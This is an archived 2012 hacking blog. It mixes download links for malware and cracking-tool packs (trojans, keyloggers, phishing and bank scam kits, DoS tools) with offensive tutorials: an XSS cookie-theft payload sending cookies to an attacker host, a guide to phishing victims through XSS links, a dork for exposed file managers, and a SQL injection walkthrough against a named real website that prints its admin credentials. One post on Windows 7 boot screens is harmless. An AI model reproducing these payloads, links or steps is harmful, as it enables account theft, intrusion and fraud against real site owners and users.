My Hacking Diary: 2012

Thursday, October 11, 2012

Tools 4 hacking

Hacking Tools
CrackersKit 2005
Golden eye 2005
HellLabs Proxy Checker v7.4.18
HostScan v1.6.5.531
Invisible Browsing v4.0
IPScanner v1.86
Ascii Factory 0.6
Cool Beans NFO Creator v2.0.1.3
Dizzy v1.10
Feuer’s NFO File Maker v2.0
Ims NFO&DIZ Maker 1.87
Inserter v1.12
NFO Creator v3.5.2
NFO Maker 1.0
Patchs All In One 2005
SoftIce 4.05 -Win 2000-XP
IP Address Scanner
IP Calculator
IP Converter
Port Listener
Port Scanner April 2005
Ping
NetStat 2005
Cool Trace Route 2005
TCP/IP Configuration
Online – Offline Checker
Resolve Host & IP
Time Sync
Whois & MX Lookup
Connect0r
Connection Analysator and prtotector
Net Sender April 2005
E-mail seeker
Cool Net Pager
Active and Passive port scanner
Spoofer
Hack Trapper
HTTP flooder (DoS)
Mass Website Visiter
Advanced Port Scanner
Trojan Hunter Multi IP April 2005
Port Connecter Tool
Advanced Spoofer
http://rapidshare.com/
files/50220724/40_Hack_tools.part1.part1.rar
http://rapidshare.com/
files/50221144/40_Hack_tools.part1.part2.rar
http://rapidshare.com/
files/50221457/40_Hack_tools.part1.part3.rar
softice 4.05 win2000-xp
patchs all in one 2005
nfo-tools all in one
net tools all in one(bes tool for hacking it include
almost200 tool
http://rapidshare.com/
files/50221899/40_Hack_tools_may_2006.part2.part
1.rar
http://rapidshare.com/
files/50222295/40_Hack_tools_may_2006.part2.part
2.rar
http://rapidshare.com/
files/50222617/40_Hack_tools_may_2006.part2.part
3.rar
ARABIAN HACKER ATTACKER CD
http://rapidshare.com/files/50223129/
Arabian_Attacker_Hacker_s_CD_V.1.0.part1.rar
http://rapidshare.com/files/50223740/
Arabian_Attacker_Hacker_s_CD_V.1.0.part2.rar
http://rapidshare.com/files/50224341/
Arabian_Attacker_Hacker_s_CD_V.1.0.part3.rar
http://rapidshare.com/files/50224616/
Arabian_Attacker_Hacker_s_CD_V.1.0.part4.rar
hacking books
http://rapidshare.com/
files/50224916/10_Usefull_Hacking_eBooks.rar
BOT MAKER
http://rapidshare.com/files/50225218/
bot___maker.rar
WEBCAM RECORDER
[content suppressed]
CRACK SEARCHING SOFTWARE
http://rapidshare.com/files/50225712/
Crack_Searching___Shareware_Ha.softarchive.net.
part1.rar
http://rapidshare.com/files/50227224/
Crack_Searching___Shareware_Ha.softarchive.net.
part2.rar
GMAIL GENERATOR.(tOOL FOR PHISHING)
[content suppressed]
TOOL TO HACK MODEM
http://rapidshare.com/files/50228170/
Hack.Modem.v6.rar
HACKING BOOKS AND TUTORIALS
http://rapidshare.com/files/50228314/
hacking_books_and_tutorial.rar
HACKER DELIGHT EBOOK
http://rapidshare.com/files/50228433/HD.rar
VIDEO OF
Local_Password_Cracking_Presentation_for_the_
Indiana_Higher_Education_Cybersecurity_Summit_
2005
http://rapidshare.com/files/50228889/
Local_Password_Cracking_Presentation_for_the_
Indiana_Higher_Education_Cybersecurity_Summit_
2005_.swf
Password Hacking AIO
PROXY TOOLS
PROXYHUNTER CHARON
PROXYRAMA
A.P.L
FORUM PROXY LEECHER
AA TOOLS
WORD LIST TOOLS
ATHENA
PARSLEY
RAPTOR
VLSTRIP
LOG SUCKER
S WORDTOOL
VCU
ALS NOVICE
STAPH
HORNY STRIPPER
XXX PASSWORD FINDER
CRACKING TOOLS
ACCESS DIVER
SENTRY
CFORCE
XFACTOR
FORM @
CAECUS 1.2
SPOOF TOOLS
SPLOOF
ZSPOOF
SUPER MEGA SPOOF
HYPERSPOOF
VIDEO TUTORIALS
FORM@
PROXYHUNTER
CFORCE
CHARON
SENTRY2
ACCESS DIVER
Password: dreatica.CL
http://rapidshare.com/files/50230566/
Password_Hacking_AIO_WCcT.us.part1.rar
http://rapidshare.com/files/50233332/
Password_Hacking_AIO_WCcT.us.part2.rar
http://rapidshare.com/files/50236350/
Password_Hacking_AIO_WCcT.us.part3.rar
DATABASE HACKER
http://rapidshare.com/files/50236419/
The_Database_Hacker_s_Handbook.rar
TROZEN
http://rapidshare.com/files/50236645/TROJANS.rar
ULTRA HACKER PACK 156 IN 1
95-ME Keygen.rar
AddrView.rar
AnonFTP.zip
AOL new.rar
AppToService.rar
arpinject.zip
aspack21.zip
Astaroth Joiner v2.rar
atk-2.1.zip
BankOfAmerica.rar
bios_pass_remover.zip
BlasterW32.zip
blue.zip
bmpripper.zip
brutus.zip
Cable Modem Sniffer.rar
CapKeys_DIGITAL.rar
CASXM138.zip
CAYZODQF.zip
CGI Founder v1.043.zip
cgis4.zip
CGISscan.zip
cia10.zip
cports.rar
craagle.zip
Crackftp.zip
CreditCardGjenerator.rar
Davs_TR_REtail.zip
DDL Sites.rar
DeepUnFreez.zip
DrVBS.zip
eBay.rar
EESBinder.zip
egold.rar
E-mail Cracker.rar
ezDataBase_Defacer.rar
F.B.I – Binder.rar
FTP Brute Forcer.rar
ftpbr.zip
Fuck Mail Bomber 2.3.rar
G00B3RS_phpBB_exploit_pack.rar
genxe-beta-0.9.0.zip
Google_Hacker_1.2.rar
grinder1.1.zip
Hack FLASH Template.zip
Hack MY Space.zip
Hack Photoshop CS2.zip
HackersAssistant.zip
HackTheGame.zip
hck.zip
hlboom.zip.zip
Hook Tool Box.rar
Hotmail Email Hacker.rar
Hotmail HAcker Gold.rar
Hotmail ScamPage.zip
HotmailHack.rar
HSBC-US.rar
hydra-4.6-win.zip
iecv.rar
IP2.rar
ipnetinfo.rar
john-17w.zip
Key Changer.rar
Key_Logger.zip
Legion NetBios Scanner v2.1.zip
Mail Boomb_2.0 YAHOO.zip
MIDNITEmassacre.zip
MooreR Port Scanner.rar
MSN Flooder 2.0.rar
MSN Messenger Account Cracker v2.0.rar
MSNLoader.rar
NET BIOS Scaner.rar
NetBIOS Name Scanner.rar
NetResView.rar
NFO Maker 1.0.zip
Nimda.zip
nkedb.zip
nolimitcracker.rar
NTPacker.zip
nts.zip
NullAddFrontend.zip
On-Off MSN.rar
OS Update Hack.rar
P0kes WormGen 2.0.zip
panther.zip
PayPal.rar
PCAnyPass.rar
Php Nuke Hacker v11.0.rar
phpBB Annihilator.rar
phpbb attack.rar
phpbb bruteforcer.rar
PhpBB pass extractor.zip
phpBB_DoS.rar
phpbb_spammer.rar
phpBBAttacker.rar
phpBBAttacker.zip
phpBBcracker.rar
PhpBuGScan.rar
PHPfucker.rar
PhpNuke_bypass.rar
Ping & Nukes.rar
Port Listener XP.rar
pqwak2.zip
procexp.rar
ProMo.rar
ProxyPro.zip
Pure phpBB Email harvester.rar
rainbowcrack-1.2-src win-lin.zip
Remote Shut Down.rar
ResHacker.zip
Rocket.zip
rpc.zip
RpcScan101.zip
Sasser.zip
SendMailer.zip
Server 2003 Keygen.rar
Server Killer.rar
showpassv10.zip
sitedigger2.zip
smbat-win32bin-1.0.4.zip
SMBdie.zip
smbproxy-win32bin-1.0.0.zip
Source Checker.rar
source codes.rar
sprut.zip
SQLScan v1.0.rar
Stealth – HTTP Scanner v1.0 build 23.zip
super.zip
SuperScan4.rar
tftpd32.273.zip
thunter.zip
TinaSoft KILL.zip
traceroute.rar
UC.Forum Spam.rar
udpflood.zip
Ultra Dos.zip
USBank.rar
Visa Spam.zip
Warez Sites.rar
Web Cracker 2.0.rar
WebCracker 4.0.rar
whoistd.rar
Win XP Activator.rar
WindowHide.rar
Windows XP Corperate Keygen.rar
Windows XP KeyGen.rar
Windows XP Product Key Changer.rar
Windows XP Product Key Checker.rar
Windows XP Product Key Viewer.rar
WindowsAdminpasswordHack.rar
wwwhack.rar
xpass.zip
xplizer.rar
Yahoo Password.zip
yahooUltraCracker.rar
zehir.zip
http://rapidshare.com/files/50237672/
ultra_hacker_pack_156_in_1.part1.rar
http://rapidshare.com/files/50238810/
ultra_hacker_pack_156_in_1.part2.rar
http://rapidshare.com/files/50239887/
ultra_hacker_pack_156_in_1.part3.rar
http://rapidshare.com/files/50240585/
ultra_hacker_pack_156_in_1.part4.rar
webcam grabber
http://rapidshare.com/files/50240767/
webcamgrabbersimple.zip
YAHOO HACKING STUFF
http://rapidshare.com/files/50241645/
yahoo_hacking_stuff.rar
YAHOO MESSENGER PASSWORD SHOW
http://rapidshare.com/files/50241756/
Yahoo_Messenger_Password_Show_V2.rar
YAHOO PASSWORD STEALER
http://rapidshare.com/files/50241854/
yahoo_passward_stealer.rar
HACKER MONITORING TOOLS.
http://rapidshare.com/files/50243679/
monitoring.part1.rar
http://rapidshare.com/files/50245490/
monitoring.part2.rar
http://rapidshare.com/files/50247487/
monitoring.part3.rar

Free Domain Name

Free Domain Name providers
http://www.s5network.info –
free .com .net .org .info .biz offer
http://www.registerfly.com, www.nucleus.be –
free .be offer
http://www.goodluckdomain.in/dotorg.html –
free .org offer
http://www.domainsite.com – free .info offer
http://forums.inuration.net –
free .com .net .org .info .biz offer
“Almost” domains (domain-like subdomains)
Note: More info on these services will be added
soon
yoursite.co.nr www.co.nr
yoursite.biz.ly www.biz.ly
yoursite.net.tc, yoursite.net.ms, etc.
www.smartdots.com, www.unonic.com, and
www.cydots.com
yoursite.us.tt, yoursite.uk.tt, etc. www.joynic.com
yoursite.int.tl www.int.tl
yoursite.i.am, yoursite.on.to, etc www.v3.com
yoursite.q.la, yoursite.1.vg, etc. www.afraid.org
yoursite.4t.com, yoursite.8k.com, etc.
www.freeservers.com
yoursite.b3.nu, etc. www.smartredirect.com
yoursite.com.ru, yoursite.net.ru, etc.
www.lifelesspeople.com
yoursite.po.gs www.po.gs
yoursite.da.ru www.da.ru
yoursite.uni.cc www.uni.cc
yoursite———- www———-
yoursite.eu.org www.eu.org – only residents / non-
profit orgs. in Europe
yoursite.za.net www.za.net – only residents /
organis. in South Africa

Monday, September 24, 2012

How to hack a website using Cross site scripting (XSS)

What is Cross site scripting :-

As quoted in wiky
"Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner."

There is no single, standardized classification of cross-site scripting flaws. but most
experts distinguish between at least two primary flavors of XSS non-persistent
and persistent to know whats persistent and non persistent click here

In this tutorial i will explain about Non-Persitent attack

First of all you must find a vulnerable site .( for this you can refer
my post on How to find a vulnarable site )

After finding a site enter a simple java script given bellow in the serch box or url bar

<SCRIPT>alert("XSS testing by hackhaholic.blogspot.com");

If a dialog box pops up as shown then the site it is vulnerable to xss

In the above example we added a harmless alert dialog box
In the next example i will show you how we can add more sophisticated and
dangours XSS attack to exploit users
One typical example is a simple cookie theft exploit
.

var+img=new+Image();img.src= "http://hacker/"%20+%20 document.cookie;

The previous JavaScript creates an image DOM object.

var img=new Image();

Since the JavaScript code executed within the http://victim/ context, it has access to the cookies

The image object is then redirected to hackers website where the victim cookies are stored

img.src="http://hacker/"%20+%20document.cookie;

Once the hacker has completed his exploit code, which looks like

http://victim/ context=">">+var+img=new+Image();img.src= "http://hacker/document.cookie;

Now the hacker will advertise this specially crafted link through spam e-mail , message board posts, Instant Message (IM)messages, and others, trying to attract user clicks. What makes this attack so effective is that
Users are more likely to click on the link because the URL contains the real Web site domain name, rather than a look-alike domain name address as in normal phishing

Phishing The Smart Way Using XSS Vulnerabilities

What is Cross Site Scripting?
It is a vulnerability typically found in web applications.A hacker can use this vulnerability to inject client-side script into web pages viewed by other users.

What can an attacker do with this?
Attackers can do the following things

Steal user cookies and can take complete account takeover
Steal data on web pages viewed by victim
Deface pages viewed by victim
Use web pages for phishing

In this article i am going to explain how phishing can be done using XSS vulnerability in web applications.To understand this, you need to have the knowledge of normal phishing.

Advantages over normal phishing:
In Normal phishing the victim will be given a link which is made by the hacker. A person with basic knowledge can recognize that it was a fake link.But in XSS the victim cannot suspect the link because it contains a trusted URL.

Demonstration Of XSS -Phishing
Steps involved in the attack

Finding a XSS vulnerability
Craft your link.
Send the link to your victim

Step 1: Finding a XSS vulnerability
First we need to find a vulnerable website. This can be done using google. Go to google and search using the following Dork.

inurl: "search.php?q="
To test the vulnerability you can inject the following code in search fields,comment fields of your website.
<script>alert("you are hacked")</script>

If it returns an alert box showing “you are hacked”, That site is vulnerable to XSS.

Step 2: Craft your link.
In this step we have to craft a link from the vulnerability of the website.
Your link will look like
http://site.com/search.php?q=<script>alert("you are hacked")</script>
You can use your specially crafted link to steal your victim’s information just as in phishing.

EXAMPLE:

I am showing you an example with vulnerable link found in google.
Note:
This link is kept here for demonstration purpose only. I will not be held responsible if you do any thing illegal with this and this bug is not fixed yet. If google fixes it,it may not work.

http://www.google.com/search?btnI&q=allinurl:http://www.101hacker.com/
(credits- wolfmankurd)

When the victim clicks this link,he will be redirected to http://www.101hacker.com/

You can replace “http://www.101hacker.com/” with your fake login page’s link.Then it takes the victim to your fake login page.

Step 3:Send the link to your victim
Now you can send your specially crafted link to the victim by any means as you do in normal phishing.

Conclusion:
This is such a dangerous vulnerability in web applications. It got 2nd rank in OWASP top 10 vulnerabilities.If a hacker finds this vulnerability in any of the bank websites, he can attempt a malicious attack against the customers of the bank and steal lots of information like credit cards, account numbers, passwords etc by simply sending a group mail to the customers of the bank.

Sunday, September 23, 2012

Open Web file Browser Using Google

Google search: "Web File Browser" "Use regular expression"

This will ask google to search for a php script used to manage files on a server. The script "Web File Browser" enables users to change files on the server. The script comes un-protected, which means that anyone who knows the exact path of the php file can have admin access to files on that server.

Thursday, September 20, 2012

How to Change Windows 7 Boot Screen

Changing boot screen of Windows 7 is not an easy thing, if you try it manually, you need to edit 5-6 system files to do the task and often that may lead to operating systems instability. With Windows 7 Boot Updater its not a problem anymore. This program can edit each and every object in Windows 7 boot screen, you can change the boot animation with any animated image(support to image formats such as BMP, PNG, GIF or TIFF), you can change the texts written on the boot screen to anything you like and even the background color to your choice.

You can download Windows 7 Boot Updater from here or through this direct link. The program is compatible with both 32-bit and 64-bit systems, but you may find some bugs in the program as its still in beta phase, so it is highly recommended to backup your system before using this.

bootsc1

Features

Modifies the boot animation, colors, text and background.
Modifies the resume from hibernation screen as well.
Will create the animation from 105 BMP, PNG, GIF or TIFF images or use a single (non-animated) image.
Does not require any other applications (like ImageX).
Designed to be idiot-proof by having numerous checks.
Automatically backs-up the modified files.
Does not require test-signing or no-integrity-checks to be enabled.
Works for all versions of Windows 7: any language, any edition, 32-bit or 64-bit, RTM or SP1.
Available in English, German, Spanish, Russian, Italian, French, Dutch, Hungarian, Hebrew, and Vietnamese.
Works even if your setup has the hidden "System Reserved" partition.
Can be run as a GUI, command-line program, or installer/uninstaller.

You can get boot screens by searching Google and many artists/designers have uploaded their creations on Deviantart, you just have to search like this.
Please like and share if this was helpful. Subscribe to stay updated.

SQL Injection Tutorial

What is an SQL Injection?

Quote:Wikipedia:

An often used way to attack the security of an website is to input SQL statements in a web form to get a badly designed website to dump the database content to the attacker - an SQL injection. It's a code injection technique that exploits a security vulnerability in a websites software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker.

Before we start:

There are a few things I recommend you use, and install when performing SQLi Attacks. They are either vital, or extremely helpful when executing your injection.

VPN (Virtual Private Network)
Firefox with the "Hackbar" addon
Patience

Beginning with the most important, I will explain what each item is for. VPN is, in short an application we will use to visually change our IP from your external, to another. This gives you more protection when hacking, as it means any IP left by you is harder to trace (But not impossible). I recommend using proXPN, just go to their website, make a free account, and you're good to go.

Secondly, Firefox. Firefox is not what i'm loving though. It's the addon, Hackbar. Just install the two, and you'll see what I mean. It will come in handy later.

And finally, patience. There are quite a few steps in this, and it doesn't always work. Just keep working at it, and you'll get it.

Finding our site - Vulnerabilities:

In order to perform the injection, we need to find a vulnerable site. Although it can be done with luck using Google, you can type in a special code to get vulnerable sites easier. The way you find these sites, is by typing any of the following codes into Google. They are not limited to these, but these are examples:

Spoiler (Click to View)

Go ahead and tap one into Google, and you'll get a multitude of sites. For my example, I will be using This site.

To test if a site has vulnerabilities, put an apostrophe after the URL, just after the numbers:

Quote:http://www.futuresfins.com/fin-detail.php?id=173
\/
http://www.futuresfins.com/fin-detail.php?id=173'

If an error is thrown, the site is vulnerable. Here's an example:

Quote:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

You've got a site, let's move on!

Working out the number of Columns:

Columns? In what? MySQL is a type of database management system, and the amount of columns are the amount held within the sites' databases. They can range from 1-???, and can me named anything the administrator wants. We need to find the number out, as we need to find out which columns are vulnerable to the injection. To do this, we use the 'order by' command.

So, we take our URL without the apostrophe on the end. At the end, type in 'order by 1--'. The two dashes are vital for the command to work. So it would be like so:

Quote:http://www.futuresfins.com/fin-detail.php?id=173 order by 1--

Now, continue to increment (increase) the number until an error comes up. This is where Hackbar comes in handy, as you can just highlight the number in the URL and press the '+' button until the error is thrown.

Quote:http://www.futuresfins.com/fin-detail.php?id=173 order by 1-- No Error

http://www.futuresfins.com/fin-detail.php?id=173 order by 2-- Throws No Error

http://www.futuresfins.com/fin-detail.php?id=173 order by 3-- Throws No Error

Etc...

http://www.futuresfins.com/fin-detail.php?id=173 order by 11-- Throws No Error

http://www.futuresfins.com/fin-detail.php?id=173 order by 12-- Throws An Error

An error came up at 12, which means column 12 doesn't exist. That means, you guessed it, there are 11 columns on this database (Note, it varies for every website you do, yours may not necessarily be 11). Make a note of the number of columns. And as a helpful hand, this is what the error may look like:

Spoiler (Click to View)

Finding out the vulnerable column:

So, we now there are 11 columns on this database. What we now need to do, is work out which column is vulnerable to the injection. Once again, we use a command, but slightly different. Firstly, at the end of our URL there are numbers (173). We need to add a '-' before this number, but after the equals.

Quote:http://www.futuresfins.com/fin-detail.php?id=-173

Note: I am not sure, but I believe you can, instead of inserting '-', replace all the numbers with 'null'. If somebody could confirm this for me, that'd be great!

Now, we will use a command called 'union all select'. This works by listing all of the column numbers separated by a comma (1-11), like so:

Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select 1,2,3,4,5,6,7,8,9,10,11--

The webpage should then throw some numbers. This one gives me 1,2,7 and 11. They will be apparent to you, for example in bold writing, but they are scattered around the place. My page looks like this:

You can take any of these numbers, but I recommend taking the first one you see for simplicities sake. Now, to put is basically, the number is the number of the column we will be executing commands in from now on.

Checking the version number:

Although this is not always a rule (But it is for the most part), for the SQLi to work the MySQL Database version has to be above Version 5. To check what version we're running on, it's very simple. Refer to the number you chose from the previous step. Take that number, and follow these steps to the bone. I have chosen number 1, in case you were wondering.

In the URL, you have the numbers. The number you have chosen should be in that set of numbers. Now, what you have to do, is take the number you chose and replace it with '@@version'. So, I chose the number '1' as it was the first that the 'union all select' command showed, so I replace it with the version command.

Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select @@version,2,3,4,5,6,7,8,9,10,11--

After executing, a version number should appear where it previously had your number. Like this:

Spoiler (Click to View)

My database version is '5.1.54-0.dotdeb.0'.

And yes! The SQL version for this site is above 5. The first number is all you need to worry about, as long as it's above 5 you're good to go. Next up, we've got to find the name of the actual database.

Finding the main database's name:

The main database is where all the other columns, and tables branch off from. We need it later in the tutorial, so listen closely.

Firstly, take your URL, and where it says '@@version', replace it with 'concat(database())'.

Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select concat(database()),2,3,4,5,6,7,8,9,10,11--

A new page should load! Now, some text should have appeared on the page, where the database version previously was. This will be (usually) different for every site you perform an SQLi on, as it is changed by the site admin. Mine looks like so, and is called 'Future_future2'.

And that's it, we have the name of the database. Make a note of it in Notepad! We will need it again!

Displaying the database's tables:

Now we have the database name, we are good to move onto the next part: Displaying the tables. The tables are what's inside the database, and contain all the data. To view them, we use a few commands. First, we add 'group' to 'concat(database())', and change 'database()' to 'table_name', like so:

Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(table_name),2,3,4,5,6,7,8,9,10,11--

We then need to add information, which will be black magic. All you need to know is, it needs to be there. It goes after the number sequence, and should say 'from information_schema.tables where table_schema=database()--'. Like so:

Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(table_name),2,3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--

At this point, all of the tables will appear.

Now, you'll want to make a note of all of those table names, for later reference. It's very important you do so. A recommendation, put it in the same text file as the database name, just two (or so) paragraphs under.

Entering the tables - Viewing their content:

Now, we have the database name, all of the main table names, and now we need to find the information from the correct table. The one we're looking for is the one with worthwhile information. Usually, it will be called something like 'users, usernames, info, userinfo', etc. On this site, mine is 'users'.

So, what you want to do is find that table. Now, we're going to have to type in a command to view it. But firstly, we need a hexadecimal (HEX) converter. There are many, but here are my two favourites, but I recommend we use the top one:

The command is as follows. You change 'group_concat(table_name)' to 'group_concat(column_name)', and 'information_ schema.tables' to 'information_schema.columns'. We also change 'table_schema' to 'table_name'. On top of this, after the equals, we add in 0x and then the HEX Number, which I am about to get onto.

We need to use TextToHex to convert the name of the table, with worthwhile information in (Mine was users), to a HEX value. To do this, just type in the name of the table, and boom, done. We then add that value after the 0x. Confusing? Look below:

users = 7573657273 in HEX

Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(column_name),2,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x7573657273--

Once again, this will give us more names of tables. However, these ones should be in a much smaller quantity. I was given four, and the two i'm interested in is 'username' and 'password'. Your table names may not always be the same, it varies between each site. Sometimes, you may not have the correct table and useless tables are given to you. You have to be persistent, and patient, and keep trying.

Entering the table content - Viewing their data:

Now, we've got lots of data picked up so far. But, there's only 4 bits which we need to use now.

Database Name - Future_future2
Main Table - users
Two Table Contents - username, password

Now, we want to find out what is inside username, and password. What you need to do, is this:

Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(contentName),2,3,4,5,6,7,8,9,10,11 from databaseName.mainTable--

So, firstly you need to fill in the red with your own data. So, mine would change to:

Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(username),2,3,4,5,6,7,8,9,10,11 from Future_future2.users--

By executing this, you would be given the data inside 'username'.

Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(password),2,3,4,5,6,7,8,9,10,11 from Future_future2.users--

And then the data inside 'password'. I now have the Admin Login, and am nearly done. Hopefully, so are you!

Username: admin
Password: foilcore

Sometimes, the password/username is crypted, usually with a type of Hash Cyptography. You then need to find a Hash Decrypter, I recommend MD5Decrypter.com, and decrypt!

Finding the Administrator's Login Page:

This is either going to be the easiest, or hardest bit of the tutorial so far. The Login page is usually the home page, with an extra bit added to the end. The most common include:

/admin
/admin.php
/login
/login.php

The list goes on for millions, just use trial and error.

Unfortunately, my site has a protection on the admin login. I cannot bypass this (I don't think), so cannot access the Admin Panel.

If you are having difficulty finding the page, there are a multitude of Python scripts, and more which can be used to find the page. I recommend using them, as they're sometimes faster, and easier.

Thank you!

Thank you for reading this tutorial, I hope I helped! If you have any problems, which appear to be with my tutorial, please let me know and I will fix them ASAP. Also, if you need a hand with anything i'm always here to help.